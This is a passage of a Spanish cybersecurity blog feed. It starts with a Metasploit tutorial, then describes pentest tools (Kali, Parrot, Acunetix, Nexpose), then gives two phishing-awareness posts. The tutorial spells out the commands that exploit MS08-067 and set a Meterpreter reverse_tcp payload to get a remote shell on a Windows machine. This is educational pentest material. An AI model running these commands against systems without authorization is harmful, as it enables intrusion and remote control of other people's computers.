Hay una serie de comandos sencillos para dar los primeros pasos. Search, use, show, set y exploit son probablemente los mejores. Probaremos explotar una de las vulnerabilidades más famosas en Windows, la MS 08-067 (para ver el boletín de la vulnerabilidad, clic aquí), una vulnerabilidad crítica descubierta en 2008 que permitía ejecución remota de código.&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Si en un paso anterior (con Nessus) encontraste que el sistema posee dicha vulnerabilidad (con Nmap podrías haber encontrado que estás lidiando con una máquina Windows), sería lógico con search encontrar el exploit a utilizar.&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
msf-pro &amp;gt; search exploits 08-067&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Entre los resultados, lo más importante es que podrás encontrar la ruta del exploit y luego con use podrás decidir utilizarlo (sí, asombroso):&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
msf-pro &amp;gt; use exploit/windows/smb/ms08_067_netapi&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
msf exploit(ms08_067_netapi) &amp;gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
El comando show mostrará las alternativas para ejecutar el exploit.&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
msf exploit(ms08_067_netapi) &amp;gt; show options&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Luego, se podrá utilizar el comando set para configurar el exploit antes de la ejecución. En este caso, definiremos el local host (nuestra dirección IP), al host remoto (la dirección IP de destino, donde se supone que ya sabemos existe la vulnerabilidad) y el payload (acción a ejecutar, en este caso usaremos reverse_tcp que nos dará una consola remota en el equipo).&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
msf exploit(ms08_067_netapi) &amp;gt; set PAYLOAD windows/meterpreter/reverse_tcp&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
msf exploit(ms08_067_netapi) &amp;gt; set LHOST [192.168.0.1]&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
msf exploit(ms08_067_netapi) &amp;gt; set RHOST [192.168.0.10]&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Finalmente, solo debes ejecutar “exploit”.&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
msf exploit(ms08_067_netapi) &amp;gt; exploit&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Si pudiste hacer estos pasos correctamente, podrás ver una consola remota en el equipo Windows y podrás testearla con comandos regulares de consola (ipconfig, dir, etc.).&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Ficha técnica&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Herramienta: Metasploit&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Sitio web: http://www.metasploit.com/&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Dónde empezar: una vez instalado, haz la prueba con alguna vulnerabilidad que permita el uso de una consola meterpreter remota, son sencillas de probar si fueron exitosas. Hay que tener precaución con las vulnerabilidades de denegación de servicio.&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Más información: Existe un documento oficial completo para dar los primeros pasos en Metasploit Framework, muy recomendable, “Metasploit Community Getting Started Guide&quot;.&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEigOBk-yakPIFqXFUaZvAosq5KhdL5lSp3l02L0tFHk_-HZOUeLOD-U8EVHtTCOQBtVbMklXHtj7MnUGebRSkkyBCGqyLmTaWQpHH-w_LU2a_WhXZNrLlyPspL_o3mfLkYlmedeylye7rE/s1600/Kali_Linux_Logo.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;700&quot; data-original-width=&quot;935&quot; height=&quot;239&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEigOBk-yakPIFqXFUaZvAosq5KhdL5lSp3l02L0tFHk_-HZOUeLOD-U8EVHtTCOQBtVbMklXHtj7MnUGebRSkkyBCGqyLmTaWQpHH-w_LU2a_WhXZNrLlyPspL_o3mfLkYlmedeylye7rE/s320/Kali_Linux_Logo.png&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;b&gt;KALI LINUX (BACKTRACK): &lt;/b&gt;Es una distribución de Linux diseñada exclusivamente para Penetration Testing. Las herramientas antes descritas (Nmap, Nessus, Metasploit) están disponibles y, no solo eso, también hay muchas más herramientas para continuar practicando. Por ejemplo, Kali (antes conocida como Backtrack) es una distribución que posee todo tipo de herramientas preinstaladas que sirven para realizar Penetration Testing.&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Kali Linux puede ser descargada como imagen ISO o directamente para VMWare. Una vez que inicias un sistema Kali Linux, verás un menú muy extenso con más de 300 herramientas para pentesters. Nmap y Metasploit Framework están incluidos en esta lista, entre otros.&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Imagen 5. Menú de Kali Linux (voiceofgreyhat.com)&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh6Vv6Ixh3OpPnDcaSKCRTCs0ZO7ogcieEAhWVj8lRy9Gvg4QCDwHppkzaZhBKX9Elgxb8MGVKXZUZYrK1sBVt7Iy2WVsd5CNG172z5ycXgUEurwXU-MedOOf1npur5G0syTFykt1hYqhs/s1600/parrot-security-os-main.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;309&quot; data-original-width=&quot;634&quot; height=&quot;155&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh6Vv6Ixh3OpPnDcaSKCRTCs0ZO7ogcieEAhWVj8lRy9Gvg4QCDwHppkzaZhBKX9Elgxb8MGVKXZUZYrK1sBVt7Iy2WVsd5CNG172z5ycXgUEurwXU-MedOOf1npur5G0syTFykt1hYqhs/s320/parrot-security-os-main.png&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;b&gt;Parrot Security OS&lt;/b&gt; es una distribución GNU/Linux especializada en la seguridad informática y orientada por tanto a realizar labores de pentesting, informática forense, hacer ingeniería inversa, navegar de forma anónima, y practicar criptografía.&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgAgCOUhMcwja8A37eea9Kb8I_7whbXeyDNZBlL1PURalVelShDvh49IS1CuYuvJw_0M2WCqiCrxM6XpYY896gI3vbrx8r2QDJhIMFURtaWDy1JWLPFyHKKD5dUtLCd5Db2M5VWMagujZs/s1600/Acunetix.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;280&quot; data-original-width=&quot;500&quot; height=&quot;179&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgAgCOUhMcwja8A37eea9Kb8I_7whbXeyDNZBlL1PURalVelShDvh49IS1CuYuvJw_0M2WCqiCrxM6XpYY896gI3vbrx8r2QDJhIMFURtaWDy1JWLPFyHKKD5dUtLCd5Db2M5VWMagujZs/s320/Acunetix.png&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;b&gt;Acunetix: &lt;/b&gt;Es un escáner de vulnerabilidades de aplicaciones web. La herramienta está diseñada para encontrar agujeros de seguridad en las aplicaciones web de la organización que un atacante podría aprovechar para obtener acceso a los sistemas y datos.&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Acunetix comprueba los sistemas en busca de múltiples vulnerabilidades incluyendo:&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
SQL injection&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Cross Site Scripting&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Passwords débiles&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Acunetix puede utilizarse para realizar escaneos de vulnerabilidades en aplicaciones web y para ejecutar pruebas de acceso frente a los problemas identificados. La herramienta provee sugerencias para mitigar las vulnerabilidades identificadas y puede utilizarse para incrementar la seguridad de servidores web o de las aplicaciones que se analizan. Mas información:&amp;nbsp;&lt;/div&gt;
&lt;/span&gt;&lt;div&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;&lt;a href=&quot;http://www.acunetix.com/&quot;&gt;http://www.acunetix.com/&lt;/a&gt;&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgxbKb32xBR0AChcwnITuWS-IUCI_ykevGHnXYwolAinD4xawh-Ts5cp5Zz9vndWWV2M1hKZdXxTl9W08OV_Bzx66copLwQoaY8CIg9EfPa1B0Gibbvz21z9Vz17kLCTN9Rx9JAHyM5NkY/s1600/logo_nexpose.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;172&quot; data-original-width=&quot;614&quot; height=&quot;89&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgxbKb32xBR0AChcwnITuWS-IUCI_ykevGHnXYwolAinD4xawh-Ts5cp5Zz9vndWWV2M1hKZdXxTl9W08OV_Bzx66copLwQoaY8CIg9EfPa1B0Gibbvz21z9Vz17kLCTN9Rx9JAHyM5NkY/s320/logo_nexpose.png&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;/span&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;Nexpose&lt;/b&gt; es una herramienta que permite ejecutar diferentes tipos de escaneos en búsqueda de vulnerabilidades en un host o red, permite la definición de determinadas opciones que nos permiten acceder a un escaneo mucho mas preciso con el uso de filtros por puertos, máquinas, segmentos de red, protocolos, etc.&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;El procedimiento de instalación es muy simple, solamente basta con descargar el software y navegar por la estructura de directorios hasta llegar al directorio nexpose/nsc, una vez allí ejecutar el fichero ./nsc.sh, esto nos permitira utilizar nexpose desde la interfaz web en la ruta &lt;a href=&quot;https://localhost:3780/&quot;&gt;https://localhost:3780/&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;Aunque resulta muy sencillo, aun hay un tema por cubrir, se trata de la base de datos SQL requerida, ya que el servidor no arranca correctamente si se encuentra una base de datos postgresql instalada y escuchando por el puerto 5432, por lo tanto es posible que sea necesario cambiar los ficheros de propiedades para especificar un valor diferente de puerto, de esta forma evitaremos conflictos:&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;nsc/conf/nsc.xml&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;editar la linea de conexión por:&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;dbms=”postgresql” db=”//127.0.0.1:5333/nexpose”&amp;gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;Posteriormente en el fichero:&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;nsc/nxpgsql/nxpdata/postgresql.conf&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;añadir:&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;port=5333&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;Con estas indicaciones el servidor debería poder iniciarse sin problemas.&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;después de instalarlo es posible que pida una clave para activar la licencia, esta clave debe ser solicitada en el sitio oficial de Nexpose&lt;/span&gt;&lt;span style=&quot;font-size: large;&quot;&gt;.&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;
&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;blogger-post-footer&quot;&gt;http://itersek.blogspot.com/&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://siforense.blogspot.com/feeds/8888429079596260879/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://siforense.blogspot.com/2018/08/que-es-un-ingeniero-de-ciberseguridad.html#comment-form' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/880510376602933946/posts/default/8888429079596260879'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/880510376602933946/posts/default/8888429079596260879'/><link rel='alternate' type='text/html' href='http://siforense.blogspot.com/2018/08/que-es-un-ingeniero-de-ciberseguridad.html' title='¿Que es un #Ingenier@ de #Ciberseguridad?'/><author><name>Irlenys Tersek</name><uri>http://www.blogger.com/profile/07935318368249890525</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgrot1y2BqE74F3yHC3d0DV5ofGrcuLqp_Fl13dQ1Bojhwomegl-P2ixxTL-ykXAgaZKM5M4TSgMq-NZq6ea7HVBXrj-sbGm5YKdZn1aOG8sNmVe3LartMTAezSZoix3g/s220/irlenystersek.png'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhr62-gSir_OyTgw0gnMWI-O343lq7qVSYofwiDS799GNIAjkxrCf4fc8RHbsPWHFSmMaXefu4e7To9yM9jeNpl8G2YAtO8KnG53aNkH4IIlYq0w9ypmco05k_navsu1l7_PDhQNdUnu4w/s72-c/IngenierodeSeguridad.png" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-880510376602933946.post-6006210965713337574</id><published>2018-08-16T18:44:00.002-04:00</published><updated>2018-08-16T18:57:18.007-04:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Phishing"/><title type='text'>Phishing scam: &quot;Recomendación lucrativa de empleo&quot; de Recursos Humanos</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjzdCb32WELa5xvRrOfPSUxkTlBwdKON2fqprp1uOpTsZxrwguKydEsga8sJEmeCOjk6vZCSiR1GwFb7HgDOHSgmCfxqeNt5kci_dcDsIRu-Obtr8eE1DJtuaqqpWxQ7E4Pdx6Ks_ugWQE/s1600/Phishing+scam.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;1600&quot; data-original-width=&quot;1600&quot; height=&quot;640&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjzdCb32WELa5xvRrOfPSUxkTlBwdKON2fqprp1uOpTsZxrwguKydEsga8sJEmeCOjk6vZCSiR1GwFb7HgDOHSgmCfxqeNt5kci_dcDsIRu-Obtr8eE1DJtuaqqpWxQ7E4Pdx6Ks_ugWQE/s640/Phishing+scam.png&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;Una estafa de phishing, con el tema &quot;&quot;Recomendación lucrativa de empleo&quot;. A continuación un ejemplo de mensaje fraudulento&lt;/span&gt;&lt;/div&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;
&lt;/span&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJ2MHNVkvVF6i8hIMYsq5hlX4vbhkfR1bM_n0d-H92F5Hj8hSr8ODML4i-O6Zn9oe-b20gNWkrFa8Pb0aTCbqmq549dV6doHTIDB2QuBmHL0ns3FRSVOLJcM2wgFsyviSMEcOKsu2eQl0/s1600/Phishing+scam.JPG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;187&quot; data-original-width=&quot;738&quot; height=&quot;162&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJ2MHNVkvVF6i8hIMYsq5hlX4vbhkfR1bM_n0d-H92F5Hj8hSr8ODML4i-O6Zn9oe-b20gNWkrFa8Pb0aTCbqmq549dV6doHTIDB2QuBmHL0ns3FRSVOLJcM2wgFsyviSMEcOKsu2eQl0/s640/Phishing+scam.JPG&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
El ejemplo anterior nos dice, &quot;Su perfil ha sido recomendado para una oportunidad de empleo lucrativo. Para obtener más información&quot; y le pide al destinatario &quot;envíe amablemente su currículum actualizado al correo electrónico: &lt;a href=&quot;mailto:hr@accentureplacement.com&quot;&gt;hr@accentureplacement.com&lt;/a&gt;&quot;.&lt;br /&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Puede haber otras variantes de este mensaje, que parecen provenir de diferentes empresa. Esté atento a correos electrónicos similares.&lt;br /&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;b&gt;NO responda si recibe este mensaje. ¡Elimina este correo electrónico de inmediato! NO proviene de una fuente que dice ser. Este correo electrónico es un intento fraudulento de obtener acceso a su información personal.&amp;nbsp;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Si ha recibido un correo electrónico de phishing o sospecha que lo tiene, infórmelo, enviando el mensaje como un archivo adjunto a &lt;a href=&quot;mailto:phishing@mcgill.ca&quot;&gt;phishing@mcgill.ca&lt;/a&gt;&lt;/div&gt;
&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;blogger-post-footer&quot;&gt;http://itersek.blogspot.com/&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://siforense.blogspot.com/feeds/6006210965713337574/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://siforense.blogspot.com/2018/08/phishing-scam-recomendacion-lucrativa.html#comment-form' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/880510376602933946/posts/default/6006210965713337574'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/880510376602933946/posts/default/6006210965713337574'/><link rel='alternate' type='text/html' href='http://siforense.blogspot.com/2018/08/phishing-scam-recomendacion-lucrativa.html' title='Phishing scam: &quot;Recomendación lucrativa de empleo&quot; de Recursos Humanos'/><author><name>Irlenys Tersek</name><uri>http://www.blogger.com/profile/07935318368249890525</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgrot1y2BqE74F3yHC3d0DV5ofGrcuLqp_Fl13dQ1Bojhwomegl-P2ixxTL-ykXAgaZKM5M4TSgMq-NZq6ea7HVBXrj-sbGm5YKdZn1aOG8sNmVe3LartMTAezSZoix3g/s220/irlenystersek.png'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjzdCb32WELa5xvRrOfPSUxkTlBwdKON2fqprp1uOpTsZxrwguKydEsga8sJEmeCOjk6vZCSiR1GwFb7HgDOHSgmCfxqeNt5kci_dcDsIRu-Obtr8eE1DJtuaqqpWxQ7E4Pdx6Ks_ugWQE/s72-c/Phishing+scam.png" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-880510376602933946.post-5336117578634302538</id><published>2018-08-05T11:21:00.003-04:00</published><updated>2018-08-05T11:21:39.936-04:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Amenazas"/><category scheme="http://www.blogger.com/atom/ns#" term="Fraude"/><category scheme="http://www.blogger.com/atom/ns#" term="Gmail"/><category scheme="http://www.blogger.com/atom/ns#" term="GoogleDocs"/><category scheme="http://www.blogger.com/atom/ns#" term="Phishing"/><title type='text'>Ataque de #phishing que uso a #GoogleDocs y #Gmail como el anzuelo</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;/div&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj_0chUirgAuyMlHndGiLExME7ICeJZLwFD78ZbpduwlDihw-yMJPlbh9WIhBHaxtjGu8Es7bfxcwwfRRuY4G3dRV-WRIpbFcTBMqzWvpmLCVp42tZGkmN_lI0EneVIrHvWXR9Z8U4m7ZE/s1600/phishing+GoogleDocs.png&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj_0chUirgAuyMlHndGiLExME7ICeJZLwFD78ZbpduwlDihw-yMJPlbh9WIhBHaxtjGu8Es7bfxcwwfRRuY4G3dRV-WRIpbFcTBMqzWvpmLCVp42tZGkmN_lI0EneVIrHvWXR9Z8U4m7ZE/s400/phishing+GoogleDocs.png&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;Google en el 2017 fue victima de uno de los ataques de phishing más elaborados que se han conocido, logrando reenviarse a millones de personas y provocando una histeria colectiva que tardó varias horas en detenerse, hasta que Google bloqueó el truco que se usaba&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;El ataque de phishing consistio:&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;La victima recibía&amp;nbsp;correos electrónicos de contactos conocidos &quot;anzuelo&quot; con un botón similar al que Gmail te muestra cuando tienes que abrir un archivo en Google Drive.&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;font-size: large;&quot;&gt;Cuando la victima pulsaba sobre el botón, se abría&amp;nbsp;una página de Google autentica que te pedía&amp;nbsp;que dieras permisos a una aplicación llamada “Google Drive”, solo que esa aplicación no es de Google, sino una que alguien había&amp;nbsp;creado para acceder a tu agenda de Gmail y reenviarles a todos tus contactos&lt;/span&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&amp;nbsp;el anzuelo.&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;¿Como reacciono Google?&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;Google bloqueó la aplicación maliciosa que provocó este pánico,&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;font-size: large;&quot;&gt;tomado acciones para proteger a los usuarios contra el correo electrónico Google Docs y desactivado las cuentas que generaban el anzuelo, eliminado las páginas falsas y publicado actualizaciones a través de Navegación Segura.&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;Aprendizaje que deja el ataque&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;El peligro no fue solo el correo electrónico que seguramente logro recolectar millones de cuentas de correos electrónicos activos para cualquier tipo de ataque o campaña de spam. El verdadero peligro es que se demostró&amp;nbsp;que este ataque de phishing es efectivo y cualquiera podría usar la misma técnica para engañar a alguien y acceder a su correo electrónico.&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;Moraleja: Aunque un correo venga de un contacto conocido, redobla tu escepticismo antes de abrir cualquier archivo o enlace.&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;table cellpadding=&quot;0&quot; cellspacing=&quot;0&quot; class=&quot;tr-caption-container&quot; style=&quot;margin-left: auto; margin-right: auto; text-align: center;&quot;&gt;&lt;tbody&gt;&lt;/tbody&gt;&lt;/table&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div class=&quot;blogger-post-footer&quot;&gt;http://itersek.blogspot.com/&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://siforense.blogspot.com/feeds/5336117578634302538/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://siforense.blogspot.com/2018/08/ataque-de-phishing-que-uso-googledocs-y.html#comment-form' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/880510376602933946/posts/default/5336117578634302538'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/880510376602933946/posts/default/5336117578634302538'/><link rel='alternate' type='text/html' href='http://siforense.blogspot.com/2018/08/ataque-de-phishing-que-uso-googledocs-y.html' title='Ataque de #phishing que uso a #GoogleDocs y #Gmail como el anzuelo'/><author><name>Irlenys Tersek</name><uri>http://www.blogger.com/profile/07935318368249890525</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgrot1y2BqE74F3yHC3d0DV5ofGrcuLqp_Fl13dQ1Bojhwomegl-P2ixxTL-ykXAgaZKM5M4TSgMq-NZq6ea7HVBXrj-sbGm5YKdZn1aOG8sNmVe3LartMTAezSZoix3g/s220/irlenystersek.png'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj_0chUirgAuyMlHndGiLExME7ICeJZLwFD78ZbpduwlDihw-yMJPlbh9WIhBHaxtjGu8Es7bfxcwwfRRuY4G3dRV-WRIpbFcTBMqzWvpmLCVp42tZGkmN_lI0EneVIrHvWXR9Z8U4m7ZE/s72-c/phishing+GoogleDocs.png" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-880510376602933946.post-2480147007869722975</id><published>2018-07-29T16:10:00.000-04:00</published><updated>2018-07-29T16:10:59.640-04:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Amenazas"/><category scheme="http://www.blogger.com/atom/ns#" term="Ciberdelincuencia"/><category scheme="http://www.blogger.com/atom/ns#" term="Ciberterrorismo"/><category scheme="http://www.blogger.com/atom/ns#" term="Criptosecuestro"/><title type='text'>Criptosecuestro  ¿Qué es? y ¿Qué no es? ¿Cómo puedo protegerme?</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
